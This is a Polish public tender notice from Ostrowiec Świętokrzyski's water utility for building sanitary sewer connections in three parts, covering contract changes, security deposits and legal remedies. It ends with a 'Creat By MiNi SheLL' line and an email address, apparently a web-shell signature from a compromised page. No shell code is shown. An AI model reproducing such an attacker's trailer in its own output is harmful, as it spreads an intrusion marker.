<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany treści umowy mogą następować w formie pisemnej, pod rygorem nieważności, w drodze aneksu do umowy podpisanego przez obie Strony.
Wykonawca ma prawo żądania przedłużenia określonego w§ 2 terminu umownego wykonania przedmiotu zamówienia, na podstawie wniosku o przedłużenie terminu wraz z uzasadnieniem, z  dwudniowym wyprzedzeniem, jeżeli niedotrzymanie pierwotnego terminu jest wynikiem:
1)	siły wyższej, przy czym za siłę wyższą przyjmuje się zdarzenie, nie posiadające swojego źródła wewnątrz jednostki Wykonawcy, niemożliwe do przewidzenia, nieoczekiwane oraz niemożliwe do zapobieżenia powstaniu jego i jego szkodliwym następstwom,
2)	zmiany przepisów prawa istotnych dla realizacji przedmiotu umowy,
3)	zaistnienia konieczności wykonania badań specjalistycznych (np. archeologicznych i innych) w ściśle określonym terminie,
4)	wyjątkowo niekorzystnych warunków atmosferycznych, uniemożliwiających wykonanie robót budowlanych w terminie określonym w §2.
Zamawiający nie ma obowiązku przedłużania terminu wykonywania przedmiotu umowy, jeżeli Wykonawca w ciągu 2 dni od dnia zaistnienia okoliczności nie przedłoży Zamawiającemu  wniosku o przedłużenie terminu wraz z uzasadnieniem.
Zamawiający w ciągu  1 dnia od daty złożenia wniosku przez Wykonawcę zadecyduje, czy i o ile przedłuży termin wykonania przedmiotu umowy.
Zamawiający przewiduje ponadto możliwość wprowadzenia poniżej wymienionych zmian do zawartej umowy w przypadku wystąpienia następujących okoliczności:
1)	zakresu przedmiotu umowy i ceny umowy, polegającego na : wyłączeniu określonej części przedmiotu zamówienia, w przypadku rezygnacji Zamawiającego z realizacji tej części zamówienia, zmian w dokumentacji projektowej spowodowanej wystąpieniem kolizji - wartość robót wyłączonych z przedmiotu zamówienia nie powinna stanowić więcej niż 10 % wartości ceny ofertowej Wykonawcy, wartość robót wyłączonych z zamówienia szacowana będzie z wykorzystaniem w pierwszej kolejności cen jednostkowych, zawartych w ofercie Wykonawcy,
2)	przedmiotu umowy bez zmiany ceny umowy, poprzez zastosowanie rozwiązań zamiennych, które warunkują osiągnięcie podobnych parametrów techniczno-eksploatacyjnych 
3)	osób, które będą uczestniczyć w wykonywaniu zamówienia w charakterze Kluczowych Specjalistów, pod warunkiem, że te osoby będą spełniały wymogi określone w warunkach przetargowych,
4)	terminu wykonania przedmiotu zamówienia , gdy wystąpiły okoliczności wymienione w ust. 2 pkt 1-4</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodociagi.ostrowiec.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Wodociągi i Kanalizacja Sp. z o.o.
ul. Sienkiewicza 91
27-400 Ostrowiec Św..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2013 godzina 11:00, miejsce: Miejskie Wodociągi i Kanalizacja Sp. z o.o.
ul. Sienkiewicza 91
27-400 Ostrowiec Św.
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ZABEZPIECZENIE NALEŻYTEGO WYKONANIA UMOWY 
Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. 
Wysokość zabezpieczenia należytego wykonania umowy
Zamawiający ustala zabezpieczenie należytego wykonania umowy zawartej w wyniku postępowania o udzielenie niniejszego zamówienia w wysokości 10 % ceny całkowitej podanej w ofercie  przez Wykonawcę,
Wybrany w zamówieniu Wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy przed zawarciem umowy.
Forma zabezpieczenia należytego wykonania umowy 
1)	Zabezpieczenie należytego wykonania umowy może być wniesione według wyboru Wykonawcy w jednej lub w kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U 2007 r. Nr 42 poz. 275 z późn. zm.).
2)	Zabezpieczenie wnoszone w pieniądzu winno być wniesione w PLN.
3)	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaci przelewem na następujący rachunek bankowy Zamawiającego: 
PEKAO S.A. O/Ostrowiec Św.  79 1240 4416 1111 0000 4956 4828 
4)	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy. 
5)	Jeżeli zabezpieczenie wniesiono w postaci gwarancji i/lub poręczeniu, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i/lub poręczenia (Zamawiającego), gwaranta i/lub poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji i/lub poręczenia) oraz wskazanie ich siedzib,
b)	dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania, numer zamówienia nadany przez Zamawiającego oraz datę ogłoszenia przetargu,
c)	precyzyjne określenie wierzytelności, która ma być zabezpieczona gwarancją i/lub poręczeniem,
d)	kwotę gwarancji i/lub poręczenia,
e)	zobowiązania gwaranta i/lub poręczyciela do: nieodwołalnego i bezwarunkowego zapłacenia kwoty gwarancji i/lub poręczenia na pierwsze pisemne żądanie Zamawiającego,
f)	zapewnienia wykonalności na terenie Rzeczpospolitej Polskiej,
g)	określenia miejsca rozstrzygania sporów w sądzie właściwym dla siedziby Zamawiającego.
6)	Jeżeli Wykonawca, którego Oferta została wybrana nie wniesie zabezpieczenia należytego wykonania umowy, Zamawiający może wybrać  najkorzystniejszą Ofertę spośród pozostałych Ofert stosownie do treści art. 94 ust. 3 ustawy.
7)	Do zmiany formy zabezpieczenia umowy w trakcie realizacji umowy stosuje się art. 149 ustawy.
Zwrot zabezpieczenia należytego wykonania umowy.
1)	Zamawiający zwróci 70% zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane.
2)	Zamawiający zwróci 30% zabezpieczenia nie później niż w 15 dniu po upływie terminu rękojmi za wady.  
POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKU POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA
 Informacje ogólne.
1)	Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów u.p.z.p., przysługują środki ochrony prawnej przewidziane art. 179 -198 g u.p.z.p.
2)	Środkami ochrony prawnej, o których mowa w pkt. 21.1.1 niniejszej SIWZ są:
a)	odwołanie,
b)	skarga do sądu.
Ponadto zgodnie z art. 181 ust. 1 u.p.z.p., Wykonawca może w terminie przewidzianym do wniesienia odwołania poinformować Zamawiającego o niezgodnej z przepisami ustawy czynności podjętej przez niego lub zaniechaniu czynności, do której jest on zoboawiązany na podstawie ustawy, na które nie przesługuje odwołanie na podstawie art. 180 ust. 2 u.p.z.p.
3)	Środki ochrony prawnej, przysługują:
a)	Wykonawcom,
b)	innym podmiotom i organizacjom, o których mowa w art. 179 u.p.z.p.,
c)	Zamawiającemu w postaci skargi do sądu określonej w art. 198 a - 198 g  u.p.z.p. 
Odwołanie.
1)	Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności Zamawiającego, podjętej w postępowaniu o udzielenie zamówienia lub zaniechania czynności, do której Zamawiający jest zobowiązany na podstawie u.p.z.p.
2)	Odwołanie powinno wskazywać czynność lub zaniechanie czynności zamawiającego, której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne uzasadniające wniesienie odwołania. 
3)	Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. 
4)	Odwołujący przesyła kopię odwołania zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. Domniemywa się, iż zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia, jeżeli przesłanie jego kopii nastąpiło przed upływem terminu do jego wniesienia za pomocą jednego ze sposobów określonych w art. 27 ust. 2. u.p.z.p.
5)	Szczegółowo kwestie dotyczące odwołania, w tym terminy wnoszenia odwołania uregulowane zostały w art.180-198 u.p.z.p.
Skarga do sądu.
1)	Skarga do sądu przysługuje stronom oraz uczestnikom postępowania odwoławczego na orzeczenie Izby.
2)	Skargę wnosi się do sądu okręgowego właściwego dla siedziby albo miejsca zamieszkania zamawiającego.
3)	Skargę wnosi się za pośrednictwem Prezesa Izby w terminie 7 dni od dnia doręczenia orzeczenia Izby, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora publicznego jest równoznaczne z jej wniesieniem. Prezes Izby przekazuje skargę wraz z aktami postępowania odwoławczego właściwemu sądowi w terminie 7 dni od dnia jej otrzymania.
4)	Skarga powinna czynić zadość wymaganiom przewidzianym dla pisma procesowego oraz zawierać oznaczenie zaskarżonego orzeczenia, przytoczenie zarzutów, zwięzłe ich uzasadnienie, wskazanie dowodów, a także wniosek o uchylenie orzeczenia lub o zmianę orzeczenia w całości lub w części. 
5)	Szczegółowo kwestie dotyczące skargi do sądu uregulowane zostały w art.198a-198 g u.p.z.p. 
PRZYNALEŻNOŚĆ DO GRUPY KAPITAŁOWEJ. 
1)  Wykonawca wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 u.p.z.p., albo informację o tym, że nie należy do grupy kapitałowej  - na podstawie wzoru załącznik Nr 6  do niniejszej SIWZ,
2)  Zgodnie z ustawą z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2007 r. Nr 50 poz. 331 z późn. zm.), zwaną dalej uokik podaje się następujące definicje:
a) Grupa kapitałowa - rozumie się przez to wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę.
b) Przedsiębiorca - rozumie się przez to przedsiębiorcę w rozumieniu przepisów o swobodzie działalności gospodarczej, a także:
- osobę fizyczną, osobę prawną, a także jednostkę organizacyjną niemającą osobowości prawnej, której ustawa przyznaje zdolność prawną, organizującą lub świadczącą usługi o charakterze użyteczności publicznej, które nie są działalnością gospodarczą w rozumieniu przepisów o swobodzie działalności gospodarczej,
- osobę fizyczną wykonującą zawód we własnym imieniu i na własny rachunek lub prowadzącą działalność w ramach wykonywania takiego zawodu,
- osobę fizyczną, która posiada kontrolę, w rozumieniu art. 4 pkt 4 uokik, nad co najmniej jednym przedsiębiorcą, choćby nie prowadziła działalności gospodarczej w rozumieniu przepisów o swobodzie działalności gospodarczej, jeżeli podejmuje dalsze działania podlegające kontroli koncentracji, o której mowa w art. 13 uokik,
- związek przedsiębiorców w rozumieniu art. 4 pkt 2 uokik - na potrzeby przepisów dotyczących praktyk ograniczających konkurencję oraz praktyk naruszających zbiorowe interesy konsumentów;
c) Przejecie kontroli - rozumie się przez to wszelkie formy bezpośredniego lub pośredniego uzyskania przez przedsiębiorcę uprawnień, które osobno albo łącznie, przy uwzględnieniu wszystkich okoliczności prawnych lub faktycznych, umożliwiają wywieranie decydującego wpływu na innego przedsiębiorcę lub przedsiębiorców; uprawnienia takie tworzą w szczególności:
- dysponowanie bezpośrednio lub pośrednio większością głosów na zgromadzeniu wspólników albo na walnym zgromadzeniu, także jako zastawnik albo użytkownik, bądź w zarządzie innego przedsiębiorcy (przedsiębiorcy zależnego), także na podstawie porozumień z innymi osobami,
- uprawnienie do powoływania lub odwoływania większości członków zarządu lub rady nadzorczej innego przedsiębiorcy (przedsiębiorcy zależnego), także na podstawie porozumień z innymi osobami,
- członkowie jego zarządu lub rady nadzorczej stanowią więcej niż połowę członków zarządu innego przedsiębiorcy (przedsiębiorcy zależnego),
- dysponowanie bezpośrednio lub pośrednio większością głosów w spółce osobowej zależnej albo na walnym zgromadzeniu spółdzielni zależnej, także na podstawie porozumień z innymi osobami,
- prawo do całego albo do części mienia innego przedsiębiorcy (przedsiębiorcy zależnego),
- umowa przewidująca zarządzanie innym przedsiębiorcą (przedsiębiorcą zależnym) lub przekazywanie zysku przez takiego przedsiębiorcę;.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Budowa przykanalików sanitarnych na ul. Bałtowskiej i Osiedlu Koszary - obejmującej wykonanie 124 odcinków przykanalików o łącznej długości 2369,60 m, w tym o 200 mm 92,70 m, o 160 mm 2276,90 m..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres realizowanych przykanalików w ramach zadania 1:
a)	Etap I (czas realizacji do 31.12.2013 r.) obejmuje:
- ul. Kopalniana - budowa 5 odcinków przykanalików o 160 mm o łącznej długości 19,20 m,
- ul. Skośna - budowa 16 odcinków przykanalików o 160 mm o łącznej długości 274,50 m,
- ul. Zbożowa - budowa 4 odcinków przykanalików o 160 mm o łącznej długości 75,40 m,
b) Etap II (czas realizacji do 30.06.2014 r.) obejmuje:
- ul. Bałtowska wschód - budowa 59 odcinków przykanalików o łącznej długości 1367,80 m, w tym:
o 160 mm 1313,20 m,
o 200 mm 54,60 m,
c)	Etap III (czas realizacji do 30.09.2014 r.) obejmuje:
- ul. Bałtowska zachód - budowa 30 odcinków przykanalików o łącznej długości 413,70 m, w tym:
o 160 mm 375,60 m,
o 200 mm 38,10 m,
d)	Etap IV (czas realizacji do 15.11.2014 r.) obejmuje:
- ul. Bałtowska-Nadkoszary - budowa 6 odcinków przykanalików o 160 mm o łącznej długości 150,40 m,
- ul. Bursztynowa - budowa 4 odcinków przykanalików o 160 mm o łącznej długości 68,60 m.
Wykaz przyłączy realizowanych w ramach zadania nr 1 oraz zestawienie zbiorcze adresami - zadanie 1 zawarte są w pliku Dokumentacje projektowe Dokumentacja projektowa-zadanie 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.40-6, 45.23.31.42-6, 45.23.24.52-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa przykanalików sanitarnych na Osiedlu Gutwin - obejmującej wykonanie 142 odcinków przykanalików o łącznej długości 3155,95 m, w tym o 200 mm 74,00 m, o 160 mm 3167,00 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres realizowanych przykanalików w ramach zadania 2:
a)	Etap I (czas realizacji do 31.12.2013 r.) obejmuje:
- ul. Gajowa - budowa 25 odcinków przykanalików o łącznej długości 704,20 m, w tym:
o 160 mm 630,20 m,
o 200 mm 74,00 m,
- ul. Leśna - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 56,70 m,
- ul. Gościniec - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 41,80 m,
- ul. Akacjowa - budowa 21 odcinków przykanalików o 160 mm o łącznej długości 584,20 m,
- ul. Jałowcowa - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 38,10 m,
- ul. Miodowa - budowa 13 odcinków przykanalików o 160 mm o łącznej długości 287,80 m,
- ul. Wrzosowa - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 53,20 m,
b) Etap II (czas realizacji do 30.06.2014 r.) obejmuje:
- ul. Siennieńska - budowa 18 odcinków przykanalików o 160 mm o łącznej długości 340,00 m, 
c)	Etap III (czas realizacji do 30.09.2014 r.) obejmuje:
- ul. Rzeczki - budowa 31 odcinków przykanalików o 160 mm o łącznej długości 659,30 m, 
d)	Etap IV (czas realizacji do 15.11.2014 r.) obejmuje:
- ul. Agrestowa - budowa 7 odcinków przykanalików o 160 mm o łącznej długości 80,10 m,
- ul. Jarzębinowa - budowa 12 odcinków przykanalików o 160 mm o łącznej długości 234,90 m, 
- ul. Malinowa - budowa 2 odcinków przykanalików o 160 mm o łącznej długości 67,20 m,
- ul. Korzenna - budowa 1 odcinka przykanalika o 160 mm o długości 19,50 m. 
Wykaz przyłączy realizowanych w ramach zadania nr 2 oraz zestawienie zbiorcze adresami - zadanie 2 zawarte są w pliku Dokumentacje projektowe Dokumentacja projektowa-zadanie 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.40-6, 45.23.31.42-6, 45.23.24.52-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa przykanalików sanitarnych na Osiedlu Częstocice, ul. Boczna, ul. Górna, ul. Nowe Piaski, ul. Partyzantów, ul. Tomaszów - obejmującej wykonanie 76 odcinków przykanalików o łącznej długości o 160 mm 1289,30 m..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres realizowanych przykanalików w ramach zadania 3:
a)	Etap I (czas realizacji do 31.12.2013 r.) obejmuje:
- ul. Józefówka - budowa 7 odcinków przykanalików o 160 mm o łącznej długości 123,50 m, w tym:
b) Etap II (czas realizacji do 30.06.2014 r.) obejmuje:
- ul. Szewieńska - budowa 10 odcinków przykanalików o 160 mm o łącznej długości 145,80 m, 
-  ul. Mała - budowa 1 odcinka przykanalika o 160 mm o długości 2,00 m,
- 	 ul. Podgórze - budowa 32 odcinków przykanalików o 160 mm o łącznej długości 355,50 m,
c)	Etap III (czas realizacji do 30.09.2014 r.) obejmuje:
- ul. Świętokrzyska - budowa 12 odcinków przykanalików o 160 mm o łącznej długości 273,10 m, 
-  ul. Boczna - budowa 1 odcinka przykanalika o 160 mm o długości 5,90 m, 
-  ul. Górna - budowa 1 odcinka przykanalika o 160 mm o długości 28,00 m,
- ul. Nowe Piaski - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 195,10 m,
-  ul. Partyzantów - budowa 1 odcinka przykanalika o 160 mm o długości 13,90m, 
-  ul. Tomaszów - budowa 1 odcinka przykanalika o 160 mm o długości 46,00m,
d)	Etap IV (czas realizacji do 15.11.2014 r.) obejmuje:
- ul. Sadowa - budowa 7 odcinków przykanalików o 160 mm o łącznej długości 100,50 m,
Wykaz przyłączy realizowanych w ramach zadania nr 3 oraz zestawienie zbiorcze adresami - zadanie 3 zawarte są w pliku Dokumentacje projektowe Dokumentacja projektowa-zadanie 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.00-6, 45.23.31.42-6, 45.23.24.52-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com